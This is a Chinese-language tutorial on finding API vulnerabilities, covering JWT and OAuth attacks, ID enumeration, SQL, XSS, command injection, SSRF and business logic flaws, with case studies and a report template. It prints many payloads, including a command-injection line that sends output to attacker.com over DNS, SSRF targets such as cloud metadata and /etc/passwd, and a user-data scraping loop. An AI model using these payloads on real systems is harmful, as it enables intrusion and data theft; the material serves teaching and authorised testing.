Day-050-API漏洞挖掘实战

# Day 48: API 漏洞挖掘实战

> Web 安全系列第 18 天 | 预计阅读时间：40 分钟 | 难度：★★★★☆

---

## 清单 目录

1. [API 漏洞挖掘概述](#api 漏洞挖掘概述)
2. [信息收集技术](#信息收集技术)
3. [认证漏洞挖掘](#认证漏洞挖掘)
4. [授权漏洞挖掘](#授权漏洞挖掘)
5. [输入验证漏洞](#输入验证漏洞)
6. [业务逻辑漏洞](#业务逻辑漏洞)
7. [自动化挖掘工具](#自动化挖掘工具)
8. [实战案例分析](#实战案例分析)
9. [漏洞报告编写](#漏洞报告编写)
10. [总结与思考](#总结与思考)
11. [参考资料](#参考资料)

---

## API 漏洞挖掘概述

### 挖掘流程

**标准流程**：
```
1. 信息收集
   - API 文档
   - 端点发现
   - 参数分析

2. 威胁建模
   - 资产识别
   - 威胁分析
   - 风险评估

3. 漏洞挖掘
   - 手工测试
   - 自动化扫描
   -  fuzzing

4. 漏洞验证
   - 复现漏洞
   - 影响评估
   - 编写报告
```

### 常见漏洞类型

**OWASP API Top 10**：
```
API1 - 对象级别授权失效
API2 - 用户级别授权失效
API3 - 过度数据暴露
API4 - 资源缺乏限制
API5 - 批量赋值漏洞
API6 - 不当的资源访问
API7 - 消费限制失效
API8 - 注入漏洞
API9 - 不当的资产配置
API10 - 日志和监控不足
```

**其他漏洞**：
```
- 认证绕过
- Token 泄露
- CORS 配置错误
- 敏感信息泄露
- 文件上传漏洞
- SSRF
- 命令注入
```

---

## 信息收集技术

### API 文档发现

**Swagger/OpenAPI**：
```
常见路径：
/swagger.json
/swagger/v1/swagger.json
/openapi.json
/api-docs
/v1/api-docs
/docs

工具：
- Swagger UI
- ReDoc
- Postman
```

**Postman Collection**：
```
常见路径：
/collection.json
/postman_collection.json
/api/collection.json

工具：
- Postman
- Collection Runner
```

### 端点发现

**暴力枚举**：
```bash
# 使用 gobuster
gobuster dir -u https://target.com/api -w api-wordlist.txt

# 使用 dirsearch
dirsearch -u https://target.com/api -e json

# 常见 API 端点
/api/v1/users
/api/v1/products
/api/v1/orders
/api/v1/auth
/api/v1/admin
```

**参数发现**：
```bash
# 使用 Arjun
arjun -u https://target.com/api/v1/users

# 使用 parameth
parameth -u https://target.com/api/v1/users?FUZZ=value
```

**JavaScript 分析**：
```bash
# 提取 JS 中的 API 端点
curl https://target.com/app.js | grep -oE '/api/[^"'\'' ]+'

# 使用 SubJS
subjs -u https://target.com | httpx -silent | waybackurls | grep api
```

### 流量分析

**抓包分析**：
```
工具：
- Burp Suite
- OWASP ZAP
- Charles Proxy
- Fiddler

分析内容：
- API 端点
- 请求方法
- 参数结构
- 认证方式
- 响应格式
```

**历史流量**：
```
工具：
- Wayback Machine
- CommonCrawl
- AlienVault OTX

用途：
- 发现废弃端点
- 发现测试端点
- 发现隐藏参数
```

---

## 认证漏洞挖掘

### JWT 漏洞测试

**Token 分析**：
```bash
# 解码 Token
jwt decode <token>

# 查看 Header
{
  "alg": "HS256",
  "typ": "JWT"
}

# 查看 Payload
{
  "user_id": 123,
  "role": "user",
  "exp": 1234567890
}
```

**算法切换攻击**：
```
测试步骤：
1. 获取有效 Token
2. 修改 Header alg 为 "none"
3. 删除 Signature
4. 发送请求

工具：
jwt_tool
```

**密钥爆破**：
```bash
# 使用 jwt_tool
jwt_tool <token> -C -p common_passwords.txt

# 使用 hashcat
hashcat -m 16500 hash.txt wordlist.txt
```

**Token 注入**：
```
测试 Payload：
{
  "user_id": "1 OR 1=1 --",
  "role": "admin' OR '1'='1"
}

测试点：
- SQL 注入
- NoSQL 注入
- 命令注入
```

### OAuth 漏洞测试

**重定向 URI 测试**：
```
测试 Payload：
/authorize?redirect_uri=http://attacker.com
/authorize?redirect_uri=//attacker.com
/authorize?redirect_uri=attacker.com
/authorize?redirect_uri=https://target.com.attacker.com

测试工具：
Burp Suite Repeater
```

**State 参数测试**：
```
测试步骤：
1. 发起 OAuth 请求
2. 检查是否有 state 参数
3. 修改/删除 state
4. 完成授权流程

问题：
- 无 state 参数
- state 可预测
- state 未验证
```

**Scope 提升测试**：
```
测试 Payload：
/scope?scope=admin
/scope?scope=read write admin

测试点：
- 未授权 scope
- scope 验证绕过
- scope 拼接
```

### 会话管理测试

**Token 过期测试**：
```
测试步骤：
1. 获取 Token
2. 等待过期
3. 使用过期 Token 请求

预期：
- 应返回 401
- 不应处理请求
```

**Token 重用测试**：
```
测试步骤：
1. 登录获取 Token
2. 登出
3. 使用旧 Token 请求

预期：
- 应返回 401
- Token 应失效
```

**并发会话测试**：
```
测试步骤：
1. 登录获取 Token A
2. 再次登录获取 Token B
3. 使用 Token A 请求

预期：
- 根据策略决定
- 应限制会话数
```

---

## 授权漏洞挖掘

### 对象级别授权测试

**ID 遍历测试**：
```
测试步骤：
1. 获取自己的资源 ID
2. 遍历相邻 ID
3. 访问他人资源

测试 Payload：
GET /api/users/123
GET /api/users/124
GET /api/users/125

自动化：
ffuf -u https://target.com/api/users/FUZZ -H "Authorization: Bearer <token>" -w ids.txt
```

**UUID 预测测试**：
```
测试步骤：
1. 获取多个 UUID
2. 分析 UUID 生成规律
3. 预测其他 UUID
4. 访问他人资源

UUID 类型：
- UUIDv1（时间 +MAC，可预测）
- UUIDv4（随机，难预测）
```

### 功能级别授权测试

**垂直权限提升**：
```
测试步骤：
1. 普通用户登录
2. 访问管理员接口
3. 尝试执行管理员操作

测试 Payload：
GET /api/admin/users
POST /api/admin/users
DELETE /api/admin/users/1
```

**水平权限提升**：
```
测试步骤：
1. 用户 A 登录
2. 操作用户 B 的资源
3. 验证是否允许

测试 Payload：
PUT /api/users/123/profile
{
  "email": "attacker@example.com"
}
```

### 上下文依赖授权测试

**工作流绕过**：
```
测试步骤：
1. 创建资源（草稿状态）
2. 直接发布（跳过审核）
3. 验证是否允许

测试 Payload：
PATCH /api/articles/123
{
  "status": "published"
}
```

**条件竞争**：
```
测试步骤：
1. 准备多个并发请求
2. 同时执行操作
3. 检查状态一致性

工具：
Burp Suite Intruder
Turbo Intruder
```

---

## 输入验证漏洞

### SQL 注入测试

**测试点**：
```
- URL 参数
- POST Body
- HTTP Header
- Cookie
- JSON 字段
```

**测试 Payload**：
```sql
# 基础测试
' OR '1'='1
" OR "1"="1
' OR 1=1 --

# 盲注
' AND SLEEP(5) --
' AND 1=1 --
' AND 1=2 --

# 报错注入
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()))) --
```

**自动化工具**：
```bash
# sqlmap
sqlmap -u "https://target.com/api/users?id=1" --batch

# NoSQLMap（MongoDB）
nosqlmap.py
```

### XSS 测试

**API 中的 XSS**：
```
测试点：
- 返回数据中的用户输入
- 错误消息
- 日志查看功能

测试 Payload：
<script>alert(1)</script>
<img src=x onerror=alert(1)>
"><script>alert(1)</script>
```

### 命令注入测试

**测试点**：
```
- 系统命令参数
- 文件操作
- 邮件发送
- 图片处理
```

**测试 Payload**：
```bash
# 基础测试
; whoami
| whoami
$(whoami)

# 时间盲注
; sleep 5
| sleep 5

# DNS 外带
; nslookup $(whoami).attacker.com
```

### SSRF 测试

**测试点**：
```
- URL 参数
- Webhook URL
- 文件导入
- 图片抓取
```

**测试 Payload**：
```
http://127.0.0.1
http://localhost
http://169.254.169.254（云元数据）
http://internal-service
file:///etc/passwd
gopher://127.0.0.1:6379/_
```

**自动化工具**：
```bash
# SSRFmap
git clone https://github.com/In3tinct/SSRFmap

# Gopherus
git clone https://github.com/tarunkant/Gopherus
```

---

## 业务逻辑漏洞

### 价格篡改测试

**测试步骤**：
```
1. 添加商品到购物车
2. 拦截请求
3. 修改价格
4. 完成支付

测试 Payload：
{
  "items": [
    {
      "id": 123,
      "price": 0.01
    }
  ]
}
```

### 数量篡改测试

**测试步骤**：
```
1. 选择商品
2. 拦截请求
3. 修改数量（负数/超大）
4. 完成订单

测试 Payload：
{
  "quantity": -1
}
{
  "quantity": 999999
}
```

### 优惠券滥用测试

**测试步骤**：
```
1. 获取优惠券码
2. 多次使用
3. 并发使用
4. 修改优惠券参数

测试 Payload：
{
  "coupon": "SAVE10",
  "amount": 1000
}
```

### 竞争条件测试

**测试步骤**：
```
1. 准备多个并发请求
2. 同时执行敏感操作
3. 检查业务逻辑一致性

场景：
- 余额转账
- 优惠券使用
- 库存扣减
- 投票计数

工具：
Turbo Intruder
```

---

## 自动化挖掘工具

### API 扫描工具

**Burp Suite**：
```
功能：
- API 扫描
- 主动扫描
- 被动扫描
- 漏洞利用

配置：
- 定义 API 范围
- 配置认证
- 设置扫描策略
```

**OWASP ZAP**：
```
功能：
- API 扫描
- 主动扫描
- 被动扫描
- 开源免费

配置：
- 导入 OpenAPI 规范
- 配置认证
- 运行扫描
```

**42Crunch**：
```
功能：
- API 安全审计
- OpenAPI 分析
- 运行时保护

配置：
- 上传 OpenAPI 文件
- 自动分析
- 生成报告
```

### Fuzzing 工具

**ffuf**：
```bash
# 端点发现
ffuf -u https://target.com/api/FUZZ -w api-wordlist.txt

# 参数 Fuzzing
ffuf -u https://target.com/api/users?FUZZ=value -w params.txt

# Header Fuzzing
ffuf -u https://target.com/api/users -H "X-FUZZ: value" -w headers.txt
```

**Arjun**：
```bash
# 发现隐藏参数
arjun -u https://target.com/api/users

# 批量扫描
arjun -i urls.txt -oT results.txt
```

### 认证测试工具

**jwt_tool**：
```bash
# Token 分析
jwt_tool <token>

# 密钥爆破
jwt_tool <token> -C -p wordlist.txt

# 漏洞测试
jwt_tool <token> -T at
```

**OAuth2-tool**：
```bash
# OAuth 测试
oauth2-tool test -u https://target.com/oauth
```

---

## 实战案例分析

### 案例 1: ID 遍历导致数据泄露

**漏洞描述**：
```
API: /api/users/{id}
问题：未验证资源所有权
影响：可访问所有用户数据
```

**发现过程**：
```
1. 登录获取自己的用户 ID（123）
2. 尝试访问 /api/users/124
3. 返回其他用户数据
4. 批量遍历获取所有用户数据
```

**利用 Payload**：
```bash
for i in {1..1000}; do
  curl -H "Authorization: Bearer <token>" \
    https://target.com/api/users/$i >> users.json
done
```

**修复建议**：
```
1. 验证资源所有权
2. 使用 UUID 替代自增 ID
3. 实施速率限制
4. 监控异常访问
```

### 案例 2: JWT 密钥泄露

**漏洞描述**：
```
问题：JWT 密钥硬编码在代码中
影响：可伪造任意 Token
```

**发现过程**：
```
1. 发现 GitHub 仓库
2. 搜索代码中的密钥
3. 找到 JWT_SECRET
4. 伪造管理员 Token
5. 访问管理员接口
```

**利用 Payload**：
```python
import jwt

secret = "hardcoded_secret_123"
payload = {
    "user_id": 1,
    "role": "admin",
    "exp": datetime.datetime.utcnow() + datetime.timedelta(hours=1)
}

token = jwt.encode(payload, secret, algorithm='HS256')
```

**修复建议**：
```
1. 使用环境变量
2. 密钥管理系统
3. 定期轮换密钥
4. 撤销泄露密钥
```

### 案例 3: OAuth 重定向攻击

**漏洞描述**：
```
问题：redirect_uri 未严格验证
影响：可窃取授权码
```

**发现过程**：
```
1. 发现 OAuth 登录
2. 测试 redirect_uri 参数
3. 发现可控制重定向
4. 构造恶意重定向
5. 窃取授权码
```

**利用 Payload**：
```
/authorize?client_id=xxx
  &redirect_uri=http://attacker.com/steal
  &response_type=code
  &scope=read
```

**修复建议**：
```
1. 白名单验证 redirect_uri
2. 精确匹配
3. 使用 state 参数
4. 监控异常授权
```

---

## 漏洞报告编写

### 报告结构

**基本信息**：
```
- 漏洞名称
- 漏洞类型
- 严重程度
- 发现日期
- 报告人
```

**漏洞描述**：
```
- 漏洞详情
- 影响范围
- 复现步骤
- 截图/视频
```

**技术细节**：
```
- 请求/响应
- Payload
- 利用代码
- 影响评估
```

**修复建议**：
```
- 短期修复
- 长期修复
- 最佳实践
- 参考资源
```

### 报告模板

```markdown
# 漏洞报告

## 基本信息
- 漏洞名称：ID 遍历导致用户数据泄露
- 漏洞类型：授权漏洞
- 严重程度：高危
- CVSS 评分：8.5

## 漏洞描述
API 未验证资源所有权，攻击者可遍历 ID 访问所有用户数据。

## 复现步骤
1. 登录获取 Token
2. 发送请求 GET /api/users/123
3. 修改 ID 为 124
4. 返回其他用户数据

## 请求/响应
Request:
GET /api/users/124
Authorization: Bearer <token>

Response:
{
  "id": 124,
  "email": "user@example.com",
  ...
}

## 影响评估
- 所有用户数据可访问
- 敏感信息泄露
- 违反隐私法规

## 修复建议
1. 验证资源所有权
2. 使用 UUID
3. 实施速率限制
4. 监控异常访问
```

---

## 总结与思考

### 核心要点回顾

1. **信息收集**
   - API 文档发现
   - 端点枚举
   - 流量分析

2. **漏洞挖掘**
   - 认证漏洞
   - 授权漏洞
   - 输入验证
   - 业务逻辑

3. **工具使用**
   - 扫描工具
   - Fuzzing 工具
   - 认证测试

### 深入思考问题

1. **自动化挖掘的局限性**？
   - 业务逻辑漏洞
   - 上下文理解
   - 误报处理

2. **AI 辅助挖掘**？
   - 模式识别
   - 异常检测
   - 智能 Fuzzing

3. **负责任的披露**？
   - 披露流程
   - 时间窗口
   - 协调披露

### 实战建议

**挖掘人员**：
1. 充分信息收集
2. 系统化测试
3. 详细记录
4. 负责任披露

**开发人员**：
1. 安全设计
2. 输入验证
3. 授权检查
4. 安全测试

**管理层**：
1. 漏洞奖励计划
2. 安全培训
3. 应急响应
4. 持续改进

---

## 漏洞挖掘方法论

### 系统化测试流程

**准备阶段**：
```
1. 环境搭建
   - 测试账户（不同权限）
   - 测试数据
   - 代理配置

2. 工具准备
   - Burp Suite
   - Postman
   - 自动化工具

3. 范围定义
   - 目标 API
   - 测试时间
   - 测试规则
```

**执行阶段**：
```
1. 信息收集
   - 文档分析
   - 端点发现
   - 参数识别

2. 威胁建模
   - 资产识别
   - 威胁分析
   - 攻击面映射

3. 漏洞测试
   - 认证测试
   - 授权测试
   - 输入验证
   - 业务逻辑

4. 漏洞验证
   - 复现漏洞
   - 影响评估
   - 编写报告
```

**报告阶段**：
```
1. 编写报告
   - 漏洞描述
   - 复现步骤
   - 影响评估
   - 修复建议

2. 沟通修复
   - 提交报告
   - 协助修复
   - 验证修复

3. 跟踪闭环
   - 修复验证
   - 重新测试
   - 关闭漏洞
```

### 测试检查清单

**认证测试清单**：
```
□ 无 Token 访问
□ Token 过期
□ Token 篡改
□ Token 重用
□ 弱密钥测试
□ 算法切换
□ None 算法
□ 密钥爆破
□ JWT 注入
□ OAuth 重定向
□ OAuth State
□ Scope 提升
□ 会话固定
□ 并发会话
```

**授权测试清单**：
```
□ ID 遍历
□ UUID 预测
□ 垂直权限提升
□ 水平权限提升
□ 工作流绕过
□ 条件竞争
□ 批量赋值
□ 资源访问
□ 功能访问
□ 数据暴露
```

**输入验证清单**：
```
□ SQL 注入
□ NoSQL 注入
□ XSS
□ 命令注入
□ 路径遍历
□ SSRF
□ XXE
□ 反序列化
□ 文件上传
□ 内容类型
```

**业务逻辑清单**：
```
□ 价格篡改
□ 数量篡改
□ 优惠券滥用
□ 竞争条件
□ 状态绕过
□ 流程跳过
□ 数据篡改
□ 逻辑绕过
```

---

## 参考资料

### 学习资源
- [OWASP API Security](https://owasp.org/www-project-api-security/)
- [API Security Testing Guide](https://www.sans.org/)
- [PortSwigger API Testing](https://portswigger.net/web-security/api-testing)

### 工具资源
- [Burp Suite](https://portswigger.net/burp)
- [OWASP ZAP](https://www.zaproxy.org/)
- [jwt_tool](https://github.com/ticarpi/jwt_tool)
- [ffuf](https://github.com/ffuf/ffuf)
- [Arjun](https://github.com/s0md3v/Arjun)

### 书籍推荐
- 《API 安全实战》
- 《Web API 测试与漏洞挖掘》
- 《白帽子讲 Web 安全》
- 《The Web Application Hacker's Handbook》

### 在线资源
- [HackerOne Reports](https://hackerone.com/hacktivity)
- [Bugcrowd University](https://www.bugcrowd.com/resources/)
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)

---

**标记 明日预告**：Day 49 - 文件上传漏洞进阶

> 本文内容仅供学习和研究使用，请勿用于非法目的。所有实验请在隔离环境中进行。

---

*本文是 365 天信息安全技术系列的第 48 篇，Web 安全部分第 18 篇，精编版本*